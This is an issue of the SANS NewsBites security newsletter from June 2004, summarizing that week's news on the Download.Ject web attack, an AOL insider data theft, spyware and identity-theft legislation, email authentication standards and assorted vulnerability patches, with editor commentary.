SANS NewsBites is a semiweekly high-level executive summary of the most important news articles that have been published on computer security during the last week. Each news item is very briefly summarized and includes a reference on the web for detailed information, if possible.
Spend five minutes per week to keep up with the high-level perspective of all the latest security news. New issues are delivered free every Tuesday and Friday.
Volume VI - Issue #26
June 30, 2004
A new format this week, more sections to help you find useful stories quickly. Let us know whether you like it better than the old design.
Legal liability question: Has anyone contacted an attorney yet about damage done by either of these two possibly negligent actions: (1) the Wittie worm when the security software vendor may have allowed many customers to have their systems disabled because selected users may not have gotten the patch for weeks after it was ready, or (2) Download.Ject damage done to consumers - through loss of identity data and banking passwords -- by infected web sites that apparently did not tell their clients that the site was infected? If you have gotten legal advice about these, please let us know by emailing info@sans.org with subject "legal liability."
Alan
TOP OF THE NEWS
DOWNLOAD.JECT ATTACKScob or Download.Ject Attack Prompts Browser Warning from US CERT
Download.Ject
Microsoft Says Servers Were Manually Compromised
ARRESTS, CONVICTIONS AND SENTENCES
AOL Employee Arrested for Alleged Theft of 92 Million Screen Names
HOMELAND SECURITY AND GOVERNMENT SYSTEMS SECURITY
DHS Wants Network Outage Information Kept Secret
STANDARDS AND BEST PRACTICES
IEEE Ratifies 802.11i Standard
THE REST OF THE WEEK'S NEWS
ARRESTS, CONVICTIONS AND SENTENCESMan Used Unsecured Wireless Network in Extortion Scheme
Russian Student Convicted on Spam Charges
Bloomberg Extortionist Completes Sentence, Awaits Deportation
Four Charged with Unauthorized Access to NC State University Campus Police Computers
HOMELAND SECURITY AND GOVERNMENT SYSTEMS SECURITY
Putnam Wants to Encourage Federal Employees to Obtain Private Sector IT Certification
State CIOs Want Homeland Security Funding to Cover Cyber Security and Interoperability
LEGISLATION
House Approves Spyware Bill
Aggravated Identity Theft Convictions Could Add Years to Sentences
PHISHING
Phishing Attacks Rise Only Slightly in May
STANDARDS AND BEST PRACTICES
Microsoft Submits New eMail Sender Authentication Standard to IETF
OASIS Ratifies Application Vulnerability Description Language 1.0
Anti-Spam Technical Alliance Releases Best Practices Proposal
STATS, STUDIES AND SURVEYS
Secunia Statistics Debunk Myth of Mac OS X Security
WORMS, ACTIVE EXPLOITS, VULNERABILITIES, AND PATCHES
Lotus Notes/Domino Vulnerabilities
Fixes Available for ISC DHCP 3 Buffer Overflow Flaws
Symantec Offers Fix for DNS Cache Poisoning Vulnerability
MISCELLANEOUS
Korean Internet Users Launch Attack on Web Site in Protest Over Offensive Content
Indian BPOs Increase Security
Instructor Offers Computer Text Book in Open Source Model
******************** Sponsored by SPI Dynamics **************************
ALERT: "Why the Web Browser is the Most Dangerous Hacking Tool" Learn why 70% of today's successful hacks involve Web Application attacks such as: SQL Injection, XSS, Cookie Manipulation, and Parameter Manipulation. All undetectable by Firewalls and IDS! Download *FREE* white paper from SPI Dynamics for a complete guide to protection!
http://download.spidynamics.com/1/ad/fwi.asp?cs1_ContSupRef=I-N-SANS6.30.04
*************************************************************************
THIS WEEK'S HIGHLIGHTED SECURITY TRAINING CONFERENCE
SANS largest Fall conference will be in Las Vegas this year - September 28 to October 6 - with seventeen immersion tracks taught by SANS best teachers, and special one day technology update programs and a big vendor expo. The brochures will arrive in a week or so. http://www.sans.org/ns2004
*************************************************************************
TOP OF THE NEWS
DOWNLOAD.JECT ATTACK
Scob or Download.Ject Attack Prompts Browser Warning from US CERT (28 June 2004)
A statement on the US CERT web site says that users can reduce their vulnerability to attacks by selecting browsers other than Internet Explorer; US CERT also recommends disabling Javascript and setting security settings to high. The latest vulnerability involves code alternately called Scob and Download.Ject that attackers surreptitiously upload onto web sites running Microsoft's Internet Information Server 5.0.-http://www.theregister.co.uk/2004/06/28/cert_ditch_explorer/print.html
Download.Ject (28/25 June 2004)
The Download.Ject attack exploits a vulnerability in Internet Information Server 5.0 and appends malicious Javascript to each page served. Users viewing infected pages get redirected to a Russian site that downloads backdoors and keystroke loggers onto users' computers. The server that held the offending code has been taken down.-http://www.eweek.com/print_article/0,1761,a=130269,00.asp
-http://asia.cnet.com/newstech/security/printfriendly.htm?AT=39184934-39001150t-3
9000005c
-http://www.securitypipeline.com/news/showArticle.jhtml;jsessionid=EIQWBHLR5YPSWQ
SNDBCCKHY?articleId=22102219&printableArticle=true
Microsoft Says Servers Were Manually Compromised (28 June 2004)
Microsoft maintains that the IIS 5.0 servers used in the attack were manually compromised rather than infected by a worm. The attack doesn't look like an automated exploit, according to a senior manager on Symantec's virus response team.-http://www.techweb.com/wire/story/TWB20040628S0006
ARRESTS, CONVICTIONS AND SENTENCES
AOL Employee Arrested for Alleged Theft of 92 Million Screen Names (24 June 2004)
Jason Smathers, a software engineer working for America Online, has been arrested on charges he broke into the ISP's computer database and stole 92 million customer e-mail addresses which were later sold to spammers. Smathers allegedly used the identification code belonging to another AOL employee to access the data he allegedly stole; his employment duties did not give him access to the customer data. Smathers also allegedly sold the list of names to Sean Dunaway of Las Vegas, who runs an Internet gambling business. Dunaway has also been arrested; both men face maximum prison sentences of five years and $250,000 fines.-http://www.washingtonpost.com/ac2/wp-dyn/A860-2004Jun23?language=printer
-http://www.nytimes.com/2004/06/24/technology/24spam.html?th=&pagewanted=prin
t&position=
-http://www.msnbc.msn.com/id/5279826/
HOMELAND SECURITY AND GOVERNMENT SYSTEMS SECURITY
DHS Wants Network Outage Information Kept Secret (23 June 2004)
The US Department of Homeland Security (DHS) is encouraging regulators to keep information about network service outages out of the public eye. A Federal Communications Commission (FCC) proposal would expand a rule enacted in the early 1990s requiring telecommunications companies to disclose to the FCC information about service outages to include high-speed data lines and wireless networks. DHS is concerned that the public availability of this sort of information could serve as a "blueprint" for attackers wishing to target US critical infrastructure. The reports to the FCC would include information about causes if the outages and the "name and type of the equipment that failed." If the FCC is determined to mandate reporting, DHS would like to see the information go to the Telecommunications Information Sharing and Analysis Center (ISAC) where it would be exempt from public disclosure.-http://www.securityfocus.com/printable/news/8966
[Editor's Note (Pescatore): So, the United States is deregulating the telecommunications infrastructure but wants to keep important service level information away from consumers? This is asinine - the best way to see improvements in telecommunications security is to have businesses and consumers be able to choose the most secure and reliable providers. Keeping that information hidden will slow down improvements, not attackers.
(Shpantzer): Do we have to do either or? Couldn't we figure out which data is so sensitive that it would be redacted from the public releases? This way the public still has information needed to make good business decisions and there is accountability in place. The redactions would then be made public when the fixes were in place, sector-wide, within a reasonable time scale. ]
STANDARDS AND BEST PRACTICES
Microsoft Submits New eMail Sender Authentication Standard to IETF (25 June 2004)
Microsoft has submitted a new email sender authentication specification draft to the Internet Engineering Task Force (IETF). The new specification, called Sender-ID, combines Microsoft's original Caller-ID for email with the Sender Policy Framework.-http://www.informationweek.securitypipeline.com/news/22102174
-http://www.infoworld.com/article/04/06/25/HNsenderidspec_1.html
IEEE Ratifies 802.11i Standard (25/22 June 2004)
The Institute of Electrical and Electronic Engineers (IEEE) has unanimously ratified the 802.11i security standard, also known as WPA2. It is believed that the ratification will encourage organizations to adopt wireless more quickly. The new specification adds the Advanced Encryption Standard (AES) to the 802.11 protocol; most of the standard has already been built into WLAN equipment since late 2002.-http://www.informationweek.securitypipeline.com/news/showArticle.jhtml;jsessioni
d=XS0FRSXL2BVOCQSNDBCSKHQ?articleId=22102078&printableArticle=true
-http://www.eweek.com/print_article/0,1761,a=130056,00.asp
-http://zdnet.com.com/2102-1103_2-5248275.html?tag=printthis
-http://www.nwfusion.com/news/2004/0625stronwlan.html
-http://www.commsdesign.com/showArticle.jhtml?articleID=22102230
************************ SPONSORED LINKS ******************************
Privacy notice: These links redirect to non-SANS web pages.
(1) CIPHERTRUST WHITE PAPER: Control spam, viruses, phishing.
"Selecting an Email Security Solution" -
http://www.sans.org/info.php?id=495
(2) Best Practices for Incident Response - Sign up for the
practitioner's guide at
http://www.sans.org/info.php?id=496
(3) PREVENT WEAK PASSWORDS: Try our AD-integrated password filter with
dictionary checking.
http://www.sans.org/info.php?id=497
*************************************************************************
THE REST OF THE WEEK'S NEWS
ARRESTS, CONVICTIONS AND SENTENCES
Man Used Unsecured Wireless Network in Extortion Scheme (25 June 2004)
Myron Tereshchuck has pleaded guilty to one count of "attempted extortion affection commerce" for attempting to extort 17 million USD in exchange for not "broadcasting" proprietary information he had stolen from Connecticut-based MicroPatent, LLC. Tereshchuk apparently had a personal grudge against the company, and used unsecured wireless networks to send threats and extortion demands to MicroPatent. He also sent harassing email messages to the company's customers.-http://www.securityfocus.com/printable/news/8991
[Editor's Note (Shpantzer): The FBI is lucky they had a solid lead on this, provided by none other than the suspect himself in his extortion attempts. It's much easier to surveil an individual suspect and rule him in or out versus trying to canvas a whole area of Wi-Fi access points for this type of malicious activity. ]
Russian Student Convicted on Spam Charges (24 June 2004)
A Russian teenager is the first person in his country to be convicted of spending spam. The unnamed student receives a one-year suspended sentence and a 3,000 RUR (just over 100 USD) fine for sending an obscene text message to 15,000 cell phone customers.-http://www.reuters.com/newsArticle.jhtml?type=technologyNews&storyID=5504916
Bloomberg Extortionist Completes Sentence, Awaits Deportation (24 June 2004)
Oleg Zezev, the Russian man convicted of attempting to extort money from Michael Bloomberg, founder of the Bloomberg financial news service, has completed his sentence and is now in an immigration prison awaiting deportation.-http://www.interfax.ru/e/B/0/28.html?menu=1&id_issue=9714309
Four Charged with Unauthorized Access to NC State University Campus Police Computers (23 June 2004)
Police have charged four men for allegedly gaining unauthorized access to North Carolina State University's campus police computer system and posting phony incidents. One of the four allegedly found a password to a secure area and shared it with the others.-http://newsobserver.com/news/nc/ncwire_news/story/1362202p-7485168c.html
HOMELAND SECURITY AND GOVERNMENT SYSTEMS SECURITY
Putnam Wants to Encourage Federal Employees to Obtain Private Sector IT Certification (22 June 2004)
Representative Adam Putnam (R-Fla.) is considering ways to encourage federal employees to acquire IT certifications. Putnam , who chairs the House Government Reform Subcommittee on Technology, Information Policy, Intergovernmental Relations and the Census, is working with administration officials and the CIO Council. A State Department pilot program is offering 10% pay increases for employees who obtain private sector IT security certification.-http://www.gcn.com/cgi-bin/udt/im.display.printable?client.id=gcndaily2&stor
y.id=26321
State CIOs Want Homeland Security Funding to Cover Cyber Security and Interoperability (21 June 2004)
At the fourth annual National Association of State Chief Information Officers (NASCIO) fly-in, 15 state CIOs asked legislators to allow cyber security and interoperability costs as homeland security funding expenses. Much of the funding has gone towards hazmat equipment, but states need "workable communications infrastructures" and need to protect critical infrastructure that is controlled with computer systems.-http://www.gcn.com/cgi-bin/udt/im.display.printable?client.id=gcn2&story.id=
26285
[Editor's Note (Shpantzer): Interoperability saves lives by reducing confusion at the site of a major incident, letting EMS, police and fire/hazmat coordinate a response. Please see
-http://www.publicsafetywins.gov/StateInop/States/state_map.cfm
for a report card on state of the states.
(Pescatore): Not a bad idea, but only after the states feel they have gotten sufficient funding and made sufficient progress in physical security and first responder communications interoperability. Cyber attacks against state systems are far, far down the list of realistic terrorist threats.]
LEGISLATION
House Approves Spyware Bill (25/24 June 2004)
The House Energy and Commerce Committee has approved a bill that would require purveyors of software that collects information about computer users to notify the users before it is installed on computers. The bill would also require that spyware be easy to remove and would allow the FTC to impose significant fines for certain practices, like logging keystrokes or stealing identities. A separate spyware bill has been introduced in the Senate. Technology companies have expressed concern that the bill could hinder legitimate applications.-http://www.techweb.com/wire/story/TWB20040625S0004
-http://www.cnn.com/2004/TECH/internet/06/24/spyware.reut/index.html
-http://news.com.com/2102-1028_3-5246876.html?tag=st.util.print
Aggravated Identity Theft Convictions Could Add Years to Sentences (25/23 June 2004)
The US House of Representatives has approved the Identity Theft Penalty Enhancement Act, which tacks on as much as five years to prison sentences for people convicted of aggravated identity theft, which involves using a stolen identity in the commission of other crimes. The US Senate passed the same bill later in the week.-http://www.eweek.com/print_article/0,1761,a=130306,00.asp
-http://www.washingtonpost.com/ac2/wp-dyn/A190-2004Jun23?language=printer
PHISHING
Phishing Attacks Rise Only Slightly in May (28/24 June 2004)
A report from the Anti-Phishing Working Group indicates that the number of phishing attacks in May, (1,197) was 6% higher than the number detected in April (1,100). April's figure marked a %178 increase from March's numbers. The group also noted that because 95% of email fraud schemes use spoofed "from" addresses, an email sender authentication method is needed to stop phishing attacks.-http://www.informationweek.com/shared/printableArticle.jhtml?articleID=22102466
-http://www.infoworld.com/article/04/06/24/HNphish_1.html
STANDARDS AND BEST PRACTICES
Microsoft Submits New eMail Sender Authentication Standard to IETF (25 June 2004)
Microsoft has submitted a new email sender authentication specification draft to the Internet Engineering Task Force (IETF). The new specification, called Sender-ID, combines Microsoft's original Caller-ID for email with the Sender Policy Framework.-http://www.informationweek.securitypipeline.com/news/22102174
-http://www.infoworld.com/article/04/06/25/HNsenderidspec_1.html
OASIS Ratifies Application Vulnerability Description Language 1.0 (24/23 June 2004)
The Organization for the Advancement of Structured Internet Standards (OASIS) has ratified the Application Vulnerability Description Language (AVDL) 1.0 as a standard, allowing security products to share information about application and web services vulnerabilities.-http://searchsecurity.techtarget.com/originalContent/0,289142,sid14_gci990131,00
.html
-http://www.eweek.com/print_article/0,1761,a=130141,00.asp
[Editor's Note (Pescatore): AVDL getting expanded beyond web application focus, and supported by vulnerability assessment and intrusion prevention products will be a good thing.]
Anti-Spam Technical Alliance Releases Best Practices Proposal (23/22 June 2004)
The Anti-Spam Technical Alliance (ASTA), which counts AOL, EarthLink, Microsoft and Yahoo among its members, has released a proposed set of best practices which includes recommendations for authenticating email. The group says that ISPs should not allow their servers to process third-party email without verifying that they are legitimate account holders. It wants major Internet service providers to "police" their networks and "cut off" computers they suspect are being used as spam zombies.-http://www.washingtonpost.com/ac2/wp-dyn/A61759-2004Jun22?language=printer
-http://asia.cnet.com/newstech/security/printfriendly.htm?AT=39184357-39001150t-3
9000005c
-http://www.eweek.com/print_article/0,1761,a=130033,00.asp
-http://www.theregister.co.uk/2004/06/23/microsoft_bt_yahoo_spam/print.html
ASTA Technology and Policy Proposal:
-http://docs.yahoo.com/docs/pr/pdf/asta_soi.pdf
[Editor's Note (Pescatore): The important part of this effort is that the big ISPs will be trying out the different email sender authentication technologies and this should speed both final development of the standards and the adoption of those standards. Now, if we could get some similar movement towards adoption of more secure DNS authentication (like DNS SEC) fighting phishing and the like could make some real progress. ]
STATS, STUDIES AND SURVEYS
Secunia Statistics Debunk Myth of Mac OS X Security (25 June 2004)
Secunia has published statistics from a database of security advisories for 3,500 products in 2003 and 2004. Broken down by number, type and significance of the flaws, the data indicates that Mac OS X has an undeservedly rosy reputation as to security.-http://www.computerweekly.com/articles/article.asp?liArticleID=131513&liArti
cleTypeID=1&liCategoryID=2&liChannelID=22&liFlavourID=1&sSearch=
&nPage=1
WORMS, ACTIVE EXPLOITS, VULNERABILITIES, AND PATCHES
Lotus Notes/Domino Vulnerabilities (24 June 2004)
Both vulnerabilities involve input validation errors. One flaw allows cross-site scripting attacks; the other can be used to execute arbitrary code on vulnerable machines.-http://searchsecurity.techtarget.com/originalContent/0,289142,sid14_gci990209,00
.html
Fixes Available for ISC DHCP 3 Buffer Overflow Flaws (23 June 2004)
Linux vendors are releasing fixes for a pair of buffer overflow vulnerabilities in ISC's Dynamic Host Configuration Protocol (DHCP) 3 application. The flaws could allow attackers to execute code with daemon process privileges or crash vulnerable systems. According to Secunia, however, "in most cases" only users on the local network could exploit the vulnerabilities. The flaws apparently affect only two releases of DCHP 3: version 3.0.1, release candidates 12 and 13.-http://www.techworld.com/news/index.cfm?fuseaction=displaynews&NewsID=1789
Symantec Offers Fix for DNS Cache Poisoning Vulnerability (22 June 2004)
Symantec has released an advisory and a hotfix for a DNS cache poisoning vulnerability in its Enterprise Firewall and Gateway Security software and VelociRaptor operating system. The flaw could be exploited to redirect people to malicious web sites or prevent them from visiting certain web sites altogether. There are as yet no reports of the vulnerability having been exploited.-http://searchsecurity.techtarget.com/originalContent/0,289142,sid14_gci989627,00
.html
MISCELLANEOUS
Korean Internet Users Launch Attack on Web Site in Protest Over Offensive Content (23 June 2004)
Korean Internet users have been launching attacks on a web site that has posted graphic footage of an execution of an American hostage and is looking for images of the execution of Korean Kim Sun-il.-http://english.chosun.com/w21data/html/news/200406/200406230055.html
Indian BPOs Increase Security (22 June 2004)
Indian business process outsourcing (BPO) companies have implemented stringent screening and monitoring policies for their employees in order to reassure foreign businesses that it is safe to outsource their work in India. At Wipro Spectramind, employees are prohibited from using mobile phones and what their computer access is monitored. Companies in India also share "blacklists" of employees who were fired for disciplinary problems. In addition, many businesses keep their data in domestic databases where the BPO employees can view it, but cannot "store, share, print or retain" the data on their systems.-http://www.infoworld.com/article/04/06/22/HNindianbpo_1.html
Instructor Offers Computer Text Book in Open Source Model (21 June 2004)
Concerned that his students were spending too much money on computer training textbooks, St. Petersburg College instructor Matt Basham has compiled a two-volume manual that anyone can download free of charge. Basham is program director for Cisco Academy; he believes that information should be available to everyone regardless of financial status.-http://www.sptimes.com/2004/06/21/news_pf/Southpinellas/SPC_tech_professor_gi.sh
tml
===end===
NewsBites Editorial Board:
Kathy Bradford, Roland Grefer, Stephen Northcutt, Alan Paller, John Pescatore, Marcus Ranum, Howard Schmidt, Bruce Schneier, Eugene Schultz, Gal Shpantzer, Koon Yaw Tan
Please feel free to share this with interested parties via email, but no posting is allowed on web sites. For a free subscription, (and for free posters) or to update a current subscription, visit http://portal.sans.org/